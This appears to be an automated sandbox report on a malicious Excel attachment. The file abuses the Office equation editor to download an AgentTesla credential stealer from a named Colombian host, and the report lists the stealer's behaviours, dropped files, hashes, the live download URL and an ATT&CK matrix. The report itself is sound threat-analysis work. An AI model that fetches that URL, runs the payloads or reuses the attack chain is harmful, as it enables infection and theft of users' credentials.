                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: ghxtg8op.exeBinary or memory string: WIN_81
                  Source: ghxtg8op.exeBinary or memory string: WIN_XP
                  Source: ghxtg8op.exeBinary or memory string: WIN_XPe
                  Source: ghxtg8op.exeBinary or memory string: WIN_VISTA
                  Source: ghxtg8op.exeBinary or memory string: WIN_7
                  Source: ghxtg8op.exeBinary or memory string: WIN_8
                  Source: ngown[1].exe.2.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                  Source: Yara matchFile source: 5.2.ghxtg8op.exe.d00000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.ghxtg8op.exe.d00000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.635366248.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.486416545.0000000000D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.635675466.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: ghxtg8op.exe PID: 3752, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3788, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected AgentTesla
                  Source: Yara matchFile source: 5.2.ghxtg8op.exe.d00000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.ghxtg8op.exe.d00000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.635366248.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.486416545.0000000000D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: ghxtg8op.exe PID: 3752, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3788, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00DB6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,5_2_00DB6283
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00DB6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,5_2_00DB6747

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information1
                  Scripting                  		2
                  Valid Accounts                  		121
                  Windows Management Instrumentation                  		1
                  Scripting                  		1
                  Exploitation for Privilege Escalation                  		11
                  Disable or Modify Tools                  		2
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services11
                  Archive Collected Data                  		13
                  Ingress Tool Transfer                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts2
                  Native API                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		11
                  Deobfuscate/Decode Files or Information                  		121
                  Input Capture                  		1
                  Account Discovery                  		Remote Desktop Protocol2
                  Data from Local System                  		1
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts33
                  Exploitation for Client Execution                  		2
                  Valid Accounts                  		2
                  Valid Accounts                  		2
                  Obfuscated Files or Information                  		1
                  Credentials in Registry                  		2
                  File and Directory Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		2
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                  Access Token Manipulation                  		1
                  DLL Side-Loading                  		NTDS138
                  System Information Discovery                  		Distributed Component Object Model121
                  Input Capture                  		22
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                  Process Injection                  		1
                  Masquerading                  		LSA Secrets341
                  Security Software Discovery                  		SSH3
                  Clipboard Data                  		Fallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                  Valid Accounts                  		Cached Domain Credentials12
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                  Virtualization/Sandbox Evasion                  		DCSync2
                  Process Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                  Access Token Manipulation                  		Proc Filesystem1
                  Application Window Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
                  Process Injection                  		/etc/passwd and /etc/shadow1
                  System Owner/User Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  Remote System Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1572388 Sample: Nova naredba_HR-WJO-12-10-2... Startdate: 10/12/2024 Architecture: WINDOWS Score: 100 38 Found malware configuration 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 Antivirus detection for URL or domain 2->42 44 15 other signatures 2->44 8 EXCEL.EXE 6 9 2->8         started        process3 file4 22 ~$Nova naredba_HR-...2-10-2024.xlam.xlsx, data 8->22 dropped 11 EQNEDT32.EXE 11 8->11         started        process5 dnsIp6 28 aquafusion.com.co 190.90.160.170, 49165, 80 GTDCOLOMBIASASCO Colombia 11->28 24 C:\Users\user\AppData\Local\...\ghxtg8op.exe, PE32 11->24 dropped 26 C:\Users\user\AppData\Local\...\ngown[1].exe, PE32 11->26 dropped 54 Office equation editor establishes network connection 11->54 56 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->56 16 ghxtg8op.exe 4 11->16         started        file7 signatures8 process9 signatures10 30 Binary is likely a compiled AutoIt script file 16->30 32 Machine Learning detection for dropped file 16->32 34 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 16->34 36 3 other signatures 16->36 19 RegSvcs.exe 2 16->19         started        process11 signatures12 46 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 19->46 48 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 19->48 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 2 other signatures 19->52

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  Nova naredba_HR-WJO-12-10-2024.xlam.xlsx66%ReversingLabsDocument-Office.Exploit.CVE-2017-11882
                  Nova naredba_HR-WJO-12-10-2024.xlam.xlsx100%AviraEXP/CVE-2017-11882.Gen

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\ghxtg8op.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ngown[1].exe100%Joe Sandbox ML

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://aquafusion.com.co/ngbx/ngown.exeG0%Avira URL Cloudsafe
                  http://aquafusion.com.co/ngbx/ngown.exejjC:0%Avira URL Cloudsafe
                  http://aquafusion.com.co/ngbx/ngown.exej0%Avira URL Cloudsafe
                  http://aquafusion.com.co/ngbx/ngown.exe100%Avira URL Cloudmalware
                  http://aquafusion.com.co/ngbx/ngown.exeroC:0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  aquafusion.com.co
                  		190.90.160.170
                  		truetrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://aquafusion.com.co/ngbx/ngown.exetrue
                    • Avira URL Cloud: malware
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://aquafusion.com.co/ngbx/ngown.exeGEQNEDT32.EXE, 00000002.00000003.482907203.000000000091F000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://aquafusion.com.co/ngbx/ngown.exejjC:EQNEDT32.EXE, 00000002.00000002.486608016.00000000008DF000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://account.dyn.com/ghxtg8op.exe, 00000005.00000002.486416545.0000000000D00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.635366248.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                      		high
                      http://aquafusion.com.co/ngbx/ngown.exejEQNEDT32.EXE, 00000002.00000002.486831561.0000000003560000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://aquafusion.com.co/ngbx/ngown.exeroC:EQNEDT32.EXE, 00000002.00000003.482907203.000000000092E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      190.90.160.170
                      		aquafusion.com.coColombia
                      		26619GTDCOLOMBIASASCOtrue

                      General Information

                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1572388
                      Start date and time:2024-12-10 14:19:00 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 6m 3s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:defaultwindowsofficecookbook.jbs
                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                      Number of analysed new started processes analysed:9
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:Nova naredba_HR-WJO-12-10-2024.xlam.xlsx
                      Detection:MAL
                      Classification:mal100.troj.spyw.expl.evad.winXLSX@6/8@1/1
                      EGA Information:
                      • Successful, ratio: 66.7%
                      HCA Information:
                      • Successful, ratio: 97%
                      • Number of executed functions: 65
                      • Number of non-executed functions: 271
                      Cookbook Comments:
                      • Found application associated with file extension: .xlsx
                      • Found Word or Excel or PowerPoint or XPS Viewer
                      • Attach to Office via COM
                      • Active ActiveX Object
                      • Scroll down
                      • Close Viewer

                      Warnings

                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                      • Execution Graph export aborted for target RegSvcs.exe, PID 3788 because it is empty
                      • Report size exceeded maximum capacity and may have missing disassembly code.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • VT rate limit hit for: Nova naredba_HR-WJO-12-10-2024.xlam.xlsx

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      08:20:48API Interceptor173x Sleep call for process: EQNEDT32.EXE modified
                      08:20:55API Interceptor234x Sleep call for process: RegSvcs.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      190.90.160.170mfyPnr7Rxa.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, SmokeLoader, StealcBrowse
                        RFQ PO9845.xlsxGet hashmaliciousUnknownBrowse

                          Domains

                          No context

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          GTDCOLOMBIASASCOHUWwCrf0mn.elfGet hashmaliciousMirai, OkiruBrowse
                          • 179.50.127.137
                          b2bXo6vmDm.exeGet hashmaliciousSystemBCBrowse
                          • 190.90.160.165
                          file.exeGet hashmaliciousSystemBCBrowse
                          • 190.90.160.165
                          td2RgV6HyP.exeGet hashmaliciousSystemBCBrowse
                          • 190.90.160.165
                          mfyPnr7Rxa.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, SmokeLoader, StealcBrowse
                          • 190.90.160.170
                          6vTIdx359L.elfGet hashmaliciousMiraiBrowse
                          • 190.90.25.189
                          RFQ PO9845.xlsxGet hashmaliciousUnknownBrowse
                          • 190.90.160.170
                          HxZECaqzaM.elfGet hashmaliciousMiraiBrowse
                          • 179.50.6.161
                          RE8pE88rcb.elfGet hashmaliciousUnknownBrowse
                          • 179.50.102.209
                          FtV0FviMeR.elfGet hashmaliciousMiraiBrowse
                          • 190.90.162.1

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ngown[1].exe

                          Download File
                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):1051136
                          Entropy (8bit):6.991830283498565
                          Encrypted:false
                          SSDEEP:24576:Tu6J33O0c+JY5UZ+XC0kGso6FaYLum4X1nJ6f7WY:9u0c++OCvkGs9FaYLume1nJ6SY
                          MD5:EF05B0557B2C8F0C951A1B21B812E75F
                          SHA1:11AAE265CC3F60806198436AC9571EEE720B908E
                          SHA-256:4BEC652194B91669F99A72CDC4DBD2DC25138E6DCD64E62248B5F69AA3539471
                          SHA-512:A2F6F831F43E277A19B49875C451F757A8B7E93C099260F8D4708B670AB81F690C9EBF68762FDF41C7F46D8F611791554B3175C0D2B7FE94C2EAA686B1060FC3
                          Malicious:true
                          Antivirus:
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Reputation:low
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L.....Wg.........."..........(.......}............@......................................@...@.......@.....................L...|....p...........................q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc........p......................@..@.reloc...q.......r..................@..B........................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Local\Temp\autDD7.tmp

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\ghxtg8op.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):143138
                          Entropy (8bit):7.930415233954861
                          Encrypted:false
                          SSDEEP:3072:DzMtZ/oXgItrhkgxKHusdWsSDsQ2Zu5Odh2zTXrS0nPO4:DzMtZagyr6gxK9FSDsQ2wOdh2zT20V
                          MD5:051F32A5901FDF7C15EA93E86BBF3A0F
                          SHA1:B3D79BE4870E5FF8F11246BEE989AB950CC3FC73
                          SHA-256:045BA7B6656DE852E5F1F2F23598A5C936E059277382B1751E52A0D41BD80F53
                          SHA-512:9785B515803D739651B2255791AB70D3D74A4965FB0ECE28FC6A4D3FA807B6B1FCEB21FD62663AC7EB649D2FC02B8398932823BEA156C5F02C69D2B8911E8229
                          Malicious:false
                          Reputation:low
                          Preview:EA06.....Z....J.Q*T...a7.L..I........z`.ni...N..4..1S.f.y......?X.O.TY...6..,...fE]....{$.q+..k6..!j....].{=..'f;.../t..cg.H@....&t....K.M).).../.I....4>Tp.r.0....JD.V.4...ss:d.n...=..L..:T..i..&...\P.4;..S......@.]( ._6.c5...}...e.eD...v.r..``........i..h.P.s.1....d.Sd.Z..}Q...',X.!4..2.p._.$."G....jAJ.R..............\.*~8.....N3.......)....oO.')s*%P.............a...7.b.J...........\N...I7z.....n.....m...4..K...p7_....=.L.zn.W..U..9.3E..e.:..q..B,S.?.K..)X.>n.q..(Wl.....<.n..K.D....G..K$..,.{).G...Rc#......[..d}.n..I=.Z.T...X.D.=.V..%.Y3.=/.t..K.0....S.. @....@..n.0.....A@[1K..u...rR.h[...`.....h\..b.?..Dk.....tyn.W.s..1W...ei..........Z.Q.T.W......}..Vo:.._T.B.sy.*m0..f.z....s..9...7.Ui4j<6s..s2.......s}zY.G....:2...sf.>P...........4.t...."....)[ ..!%..d.x..K..M..=..l.Xb..A"...b.H..*.Zh.k,...3*%b..Z.....Z.Q*.(...2.Mht....M.M.`.D..H.B*T.|.....b.G..4..at.<&...B.,..& u...I...)...x.A.Z.BoL..c..e....XoQ...kI.3*...w.6.s&...j"..Z..zt..U.L.Z.e..

                          C:\Users\user\AppData\Local\Temp\autE07.tmp

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\ghxtg8op.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):14568
                          Entropy (8bit):7.633331238706717
                          Encrypted:false
                          SSDEEP:384:ITYznwMNeAOPPYLDfvWME/eTk5mUOY49D1nSH6RZ5DPsi6t:IAwJV8DfvWkOL4bSHsZ5rq
                          MD5:0B168D705ACB9CD0F87A19AA68B58ECF
                          SHA1:712895BE031EE9820A2E9BA626B70C2C97565D98
                          SHA-256:8D5450118D094BD586A153AB0E6DF9A14FB304C266623614FFA54A22C774E3AA
                          SHA-512:201E399EAA1E364526CEF3C38905EA4EB46635A806BBB95D03EEB2B2DBFF71EEEAAE68CD0EAB7466FAC9E1A7616C629EF14E92BC7B66BA1842BE9C87B3D0EB49
                          Malicious:false
                          Reputation:low
                          Preview:EA06..0..[.....+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...

                          C:\Users\user\AppData\Local\Temp\cerecloths

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\ghxtg8op.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):240128
                          Entropy (8bit):6.565914891381696
                          Encrypted:false
                          SSDEEP:6144:t78NtQ7umAd/qScP4S58xMk0T9an6gDTw:hstL3BI4Kk0T86sw
                          MD5:F5F22C9B86F5265099E677983B730EEA
                          SHA1:307810F6EC3796AF29924AAA7D2E28B8A600B386
                          SHA-256:95BE62558001287F393C2B33D1A48D894A3399D5E65A4A2664780C975E7DCFF8
                          SHA-512:CA841BC2593C0EBE4ACE6CFB190031761793688CD3CBD342CB78D397D39B8FF0F03895425A2E12CCAD4C47ACC94E10CA0CBD075EE228CECE6F1A9F6C51D656D9
                          Malicious:false
                          Reputation:low
                          Preview:.j.L15CJ6DRM..07.25CJ2DR.EK07L25CJ2DRMEK07L25CJ2DRMEK07L25CJ.DRMKT.9L.<.k.E..d.X^?.E1%U63 e(QY"]Ac(Wd 8+kYYlvz.j_+6(kF==h25CJ2DR..K0{M15.g.!RMEK07L2.CH3OSFEK.4L2=CJ2DRM{.37L.5CJ.GRME.07l25CH2DVMEK07L21CJ2DRMEK03L27CJ2DRMGKp.L2%CJ"DRME[07\25CJ2DBMEK07L25CJ2..NE.07L2.@JtARMEK07L25CJ2DRMEK07.15OJ2DRMEK07L25CJ2DRMEK07L25CJ2DRMEK07L25CJ2DRMEK07L25Cj2DZMEK07L25CJ2LrME.07L25CJ2DRMk?UO825C..GRMeK07.15CH2DRMEK07L25CJ2dRM%eBD>Q5CJtARME.37L45CJ.GRMEK07L25CJ2D.ME..E)^Z J2HRMEK.4L27CJ2.QMEK07L25CJ2DR.EKr7L25CJ2DRMEK07L2..I2DRME.07L05FJ..PMQz17O25CK2DTMEK07L25CJ2DRMEK07L25CJ2DRMEK07L25CJ2DRMEK07L25CW......1.?!M.b.*.H._..:.}K.X.0$..ysN.....b>6..2.Lz..D....9.=F33.....WGC;+.Ek],.V.....b>r..K+.J..Kq.\Bv.l.j...~K&....C..V,'.%"=)..d-TT1#.F.LEK07.......$=.j.O=+wXJ.....%4d...:RME/07L@5CJSDRM.K07#25C$2DR3EK0IL25.J2D.MEK.7L2.CJ2)RMEo07LL5CJ.9]B...^?..CJ2DRx....!.....s..}A.2iW{..6...j2..:+.E.....>..Yy.]`/Tn..76J60AM6G^pK....7GN7FUIFG.9...k.b.|..=....H..MEK07L.5C.2DR..K.7L2.C.2..MEK..L.5.J...M

                          C:\Users\user\AppData\Local\Temp\ghxtg8op.exe

                          Download File
                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):1051136
                          Entropy (8bit):6.991830283498565
                          Encrypted:false
                          SSDEEP:24576:Tu6J33O0c+JY5UZ+XC0kGso6FaYLum4X1nJ6f7WY:9u0c++OCvkGs9FaYLume1nJ6SY
                          MD5:EF05B0557B2C8F0C951A1B21B812E75F
                          SHA1:11AAE265CC3F60806198436AC9571EEE720B908E
                          SHA-256:4BEC652194B91669F99A72CDC4DBD2DC25138E6DCD64E62248B5F69AA3539471
                          SHA-512:A2F6F831F43E277A19B49875C451F757A8B7E93C099260F8D4708B670AB81F690C9EBF68762FDF41C7F46D8F611791554B3175C0D2B7FE94C2EAA686B1060FC3
                          Malicious:true
                          Antivirus:
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Reputation:low
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L.....Wg.........."..........(.......}............@......................................@...@.......@.....................L...|....p...........................q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc........p......................@..@.reloc...q.......r..................@..B........................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Local\Temp\oxmanship

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\ghxtg8op.exe
                          File Type:ASCII text, with very long lines (65536), with no line terminators
                          Category:dropped
                          Size (bytes):143378
                          Entropy (8bit):2.992214787701521
                          Encrypted:false
                          SSDEEP:96:AIXLr4j+F05BmsDo6Mi0Fl7dSA6suHCCGcuY9Ihyvuu3srWVjjGqnBaAJZdjureP:H30jU7qnGcuY9Ihyvuu3srWVeqnBaA
                          MD5:030C49A335A83FF97BCCA1A235B52F7A
                          SHA1:B2678A23F36BD3393EF5D9C90D4CAAF9A53C891E
                          SHA-256:CFAA9115C0D2FA15BF241234EC585B7012D2ADC7901A09516B804522B0A034AA
                          SHA-512:3F86EA7108B7E13AC16689B20F102748280473D580FD700FB1B5C342A8C6B6290C62B945B337C35C17AE621512223EA5D991D2ED1C140967DB4406CC6EFD724E
                          Malicious:false
                          Reputation:low
                          Preview:dowp0dowpxdowp5dowp5dowp8dowpbdowpedowpcdowp8dowp1dowpedowpcdowpcdowpcdowp0dowp2dowp0dowp0dowp0dowp0dowp5dowp6dowp5dowp7dowpbdowp8dowp6dowpbdowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp8dowp4dowpbdowp9dowp6dowp5dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp8dowp6dowpbdowpadowp7dowp2dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp8dowp8dowpbdowp8dowp6dowpedowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp8dowpadowpbdowp9dowp6dowp5dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp8dowpcdowpbdowpadowp6dowpcdowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp8dowpedowpbdowp8dowp3dowp3dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp9dowp0dowpbdowp9dowp3dowp2dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp9dowp2dowpbdowpadowp2dowpedowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp9dowp4dowpbdowp8dowp6dowp4dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9

                          C:\Users\user\Desktop\~$Nova naredba_HR-WJO-12-10-2024.xlam.xls

                          Download File
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):165
                          Entropy (8bit):1.4377382811115937
                          Encrypted:false
                          SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                          MD5:797869BB881CFBCDAC2064F92B26E46F
                          SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                          SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                          SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                          Malicious:false
                          Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                          C:\Users\user\Desktop\~$Nova naredba_HR-WJO-12-10-2024.xlam.xlsx

                          Download File
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):165
                          Entropy (8bit):1.4377382811115937
                          Encrypted:false
                          SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                          MD5:797869BB881CFBCDAC2064F92B26E46F
                          SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                          SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                          SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                          Malicious:true
                          Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                          Static File Info

                          General

                          File type:Microsoft Excel 2007+
                          Entropy (8bit):7.998191833534959
                          TrID:
                          • Excel Microsoft Office Open XML Format document (35004/1) 81.40%
                          • ZIP compressed archive (8000/1) 18.60%
                          File name:Nova naredba_HR-WJO-12-10-2024.xlam.xlsx
                          File size:687'458 bytes
                          MD5:80422f16531f8c43944e04bf3538efdf
                          SHA1:f137aa50426c79fa8645d6bfc2610a98cf2c4fa3
                          SHA256:971e2daca5513d707e83bc64690d35a29a7c27d02fa0f1dce8b6694e79b9a65c
                          SHA512:dec49d2e88d90d2718b8f628e9eec88561e3ca9d0520672dcba49e2cfc4ef78ee44919fb7d445578a50b6eb347176b13f378de88d46fe15714e8e723c6ccc51a
                          SSDEEP:12288:tOnI4PKOkIHM9vnRlZChi+phVy3PXkPwS9OX3sK6w14sy2rmU9yDQY:RUHs95lZr+p7y/XtEOHsQ14zuWJ
                          TLSH:14E423DBEEE3180FE323C9B1C0CE34EA279921354B6D9845277C1599312F36B396625E
